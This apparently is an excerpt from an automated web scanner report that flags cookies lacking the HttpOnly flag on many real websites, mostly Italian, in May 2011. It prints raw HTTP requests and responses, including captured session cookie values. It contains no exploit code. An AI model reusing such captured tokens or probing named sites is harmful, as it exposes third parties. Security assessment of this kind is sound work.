The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /faves HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jsp/Guidaffari_SHW_qi_090114_img.jsp HTTP/1.1
Host: websystem.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:14:02 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch
Set-Cookie: JSESSIONID=61EF80E340B75E472EEBC0C0202B46D0; Path=/jsp
Location: http://adv.ilsole24ore.it/RealMedia/ads/adstream_nx.ads/advertising.ilsole24ore.com/2009/Guidaffari@x14
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
amp.machine.id.cookie=aGFalo1QTnjVo3O-GQjgJCK; Expires=Sun, 21 May 2079 01:43:24 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /action/appDetail/292639 HTTP/1.1
Host: www.applications.sciverse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:29:19 GMT
Server: www.applications.sciverse.com 9999
Location: http://www.applications.sciverse.com/action/userhome
Content-Length: 0
Set-Cookie: JSESSIONID=0001aGFalo1QTnjVo3O-GQjgJCK:15gmm1282; Path=/
Set-Cookie: amp.machine.id.cookie=aGFalo1QTnjVo3O-GQjgJCK; Expires=Sun, 21 May 2079 01:43:24 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/plain
Content-Language: en-US
Connection: close
X-RE-Ref: 1 -1914337877
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autostrade/isMobile.do HTTP/1.1
Host: www.autostrade.it
Proxy-Connection: keep-alive
Referer: http://www.autostrade.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.capterra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /vendita HTTP/1.1
Host: www.casa.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wps/find/advproductsearch.cws_home HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 18145
Set-Cookie: JSESSIONID=0000chAFJT9k1-7riqUcTLttp8R:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wps/find/journaldescription.cws_home/939/description HTTP/1.1
Host: www.elsevier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:31:34 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 29074
Set-Cookie: JSESSIONID=0000Cjq87kPWlgkIPjknm4Tfz-d:142fmli5a; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wps/find/subject_area_browse.cws_home HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Set-Cookie: JSESSIONID=00000tgzsbHpQGPfwgTcttEOHZ3:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 209320
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /GlfeWeb/gl/it/home.html HTTP/1.1
Host: www.genialloyd.it
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
WsId=130438129946916680041160.75183102876704720416; Expires=Wed, 02 May 2012 00:08:18 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /scripts/services/dynamicsGalleryService.asp?idCollection=3615&nax=2 HTTP/1.1
Host: www.yoox.com
Proxy-Connection: keep-alive
Referer: http://www.yoox.com/_partners/luxury24/slide_luxury_moda_210x195.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=apnlbZaRkP6dPeCnw7cTj0ZaA4FZb2mq3iZc5QWFcgQ1qoaFjZb7yhwYou30slVghs777kSRP6F4n7i4tbkDBKA3flNWD7G4PrKidUMm4uHEhIZbgu7f5RJ6Sa852UJS62FpwTKLUBnfZakQh4lKZc5cvGAin5YrlLuZcrSoenpptWZd5Ws2WcQxH9qhdyub6dneP6MHPteqOCDDfTudRLe8sGVellGGcqPPgCmJZbdQ3cogm2Exrfum7vCU9QcUoVg0iUQ4mSg3bdbyrPVL9SSnqFyl9B85wGr1mSGE8vsQwu873SoOIxNk8Xj16bmj7cg4EZcjdFawnctijtTLoj9brK6A5SyywLwtng11wTxlj8VNZd4a1xCdgFoipLtKE5IjIGrbSBM5hOZdk3hP6nbX2cmrPx259CZcVUrQllJZc1S5MADWQhSgjmADaf4ERECORSWYoZbQZdOekqyZavT6lEatuVUZbxVoGHofFfhvYmYFthR6EEMHBdR57R6xADTxm9SHUXHNetUo5Xs035eWtbPu;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 02 May 2011 22:31:04 GMT
Expires: Mon, 02 May 2011 22:31:04 GMT
Cache-Control: private
Content-Length: 5973
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon May 02 04:27:54 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 02 May 2011 23:54:10 GMT
Expires: Mon, 02 May 2011 23:54:10 GMT
Cache-Control: private
Content-Length: 244
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad/tiscaliadv.jsp?loc=ans_ans_hom_304x450_d&l3d=http://ad.it.doubleclick.net/click%3Bh%3Dv8/3afb/3/0/%2a/d%3B223125489%3B0-0%3B1%3B22822695%3B31939-304/450%3B35898920/35916798/1%3B%3B%7Eaopt%3D2/1/4/0%3B%7Esscs%3D%3f&bt=a&wt=n&rnd=281253354039 HTTP/1.1
Host: ad78.neodatagroup.com
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"; policyref="/ad/w3c/p3p.xml"
Set-Cookie: cP=AQkCX2WTj3IICQAAAAABS7g6AP///50AAQAAAgAEtzwAAQAAA3VzLS0tLQAA; path=/; domain=neodatagroup.com; expires=Fri, 30-Apr-2021 00:17:39 GMT
Set-Cookie: cS=AQIABLc8AAEAAAcAAE9ZAAEAAA==; path=/; domain=neodatagroup.com;
Set-Cookie: cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 758
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:17:39 GMT
Connection: close
var adCUrl='http://adlev.neodatagroup.com/ad/clk.jsp?x=179706.157501.1063.309052.-1.-1.9.78.1.1230.1.-1.-1.-1..-1.16..4.%26link=http%3A%2F%2Fclk.tradedoubler.com%2Fclick%3Fp%3D205518%26a%3D1527836%26g ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder? HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:39 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMID=adc1d6f34dbf2c90; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Content-Length: 37380
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript
function OAS_RICH(position) { if (position == 'BackGround') { document.write ('<A HREF="http://adv.ilsole24ore.it/5c/www.ilsole24ore.it/10/_01_000_/_homepage/1266591715/BackGround/OasDefault/default/e ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.webank.it/lndpage/promo321.html">here</ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930 HTTP/1.1
Host: adv.ilsole24ore.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011QH1NVU1088N; RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.stile-magazine.it">here</A>.<P> <HR> <A ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /question/index HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:12 GMT
Set-Cookie: B=5sbapqt6rubmg&b=3&s=f4; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Status: 404 Not Found
Imagetoolbar:
Set-Cookie: answers=SmhGfTfoOQ0db.8ef0vD2MzHIRDUJi5bCY5ng3si3sBcAcCR4N72Pka1dVM2fcTrURXaSQYY2_mqK8uzpRHwf9wPbtuRYlbhorqJHtpY2GKqq.JsOSGpmveDCpUBh22NekdTb4.cmnPTfArTQUtT07zHPK_iVLSXlvnJbBt6ti1cTQIQlPFAI_bPyYeDaLWdmUHgXpNxWiIe46.buzxw7UQd5xq8H6dOqfL6ipn42XhIN1GeHTcHUzKQV.U_fRrPr55OCJ.J7Bxj2CERgjpSSffDzPPFlCBJqDJdNxsbpZKA_6AQnjW_woyyiObtdzgEKGzlwreqRQTbIxmyF_NzaHvwbf75KWnggrA48ra6cEeQaePU71NHfUw3d4hFiGzlsgQ7d9vY8aWxBVrogLo9OHQSLvBDpNxTJ4E8Pfsui6MJMPPZhZ_f7X6_Sy3GDbWnwEaO4aHqcCPApAa32_FMh7BKzsioUMzDf_u9cdhNDWdImio6wGJ9KDo-; expires=Wed, 02-May-2012 22:23:12 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 31141
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-us" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: assicurazione-auto.ansa.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-3eks
Set-Cookie: ASSICURAZIONE=7df3ca5deff089f37cd94af9899acff2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: Private
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
slat=1304375040; domain=.alice.it; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aap/serviceforwarder HTTP/1.1
Host: auth.rossoalice.alice.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:23:33 GMT
Server: Apache
Location: http://maileservizi.alice.it/home/login.html
Set-Cookie: slat=1304375040; domain=.alice.it; path=/
Connection: close
Content-Type: text/html
Content-Length: 283
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://maileservizi.alice.it/home/ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm/tr/17671-124835-21707-7?mpt=1304392432100 HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: svid=68257899343; expires=Fri, 2-May-2014 5:23:04 GMT; path=/; domain=.eyewonder.com;
Set-Cookie: mojo3=17671:21707; expires=Thu, 2-May-2013 5:23:04 GMT; path=/; domain=.eyewonder.com;
Content-Type: image/gif
Content-Length: 49
Date: Mon, 02 May 2011 22:16:38 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:25:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 5898
Content-Type: text/html
Expires: Sun, 01 May 2011 21:25:26 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=&LanguageCode=EN&Password=&Username=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
ACCEPT-RANGES: none
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <lin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /post HTTP/1.1
Host: del.icio.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 22:24:02 GMT
Set-Cookie: BX=269mihl6rubo2&b=3&s=pq; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.icio.us
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/post
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 162
The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P> <!-- fe09.web.del.ac4.yahoo.net uncompressed/chunked Mon May 2 22:24:02 UTC 2011 -->
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: en.camera.it
Proxy-Connection: keep-alive
Referer: http://www.camera.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_IT/company/corporate-communication/eni-social-media/eni-social-media.shtml HTTP/1.1
Host: eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:08 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: TS782077=4d646e48ff1d60f4107961ec3cc649fa38ef4af4554824e14dbf2f07; Path=/
Content-Length: 63332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Eni in the Soc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_IT/company/culture-energy/figures/figures.shtml HTTP/1.1
Host: eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:10 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: TS782077=26e351c880aaf249c0f13815ae124e8174633c80af6e09a34dbf2f09; Path=/
Content-Length: 64780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>World Oil and ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_IT/sustainability/news/2010-10-20-eni-global-leaders-2010.shtml HTTP/1.1 Host: eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:11 GMT Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: TS782077=d85108374d59830f57586c5e4199fa2db6bcad4b4472ab294dbf2f0a; Path=/ Content-Length: 57713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Eni ranks firs ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.aspx HTTP/1.1 Host: feedback.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
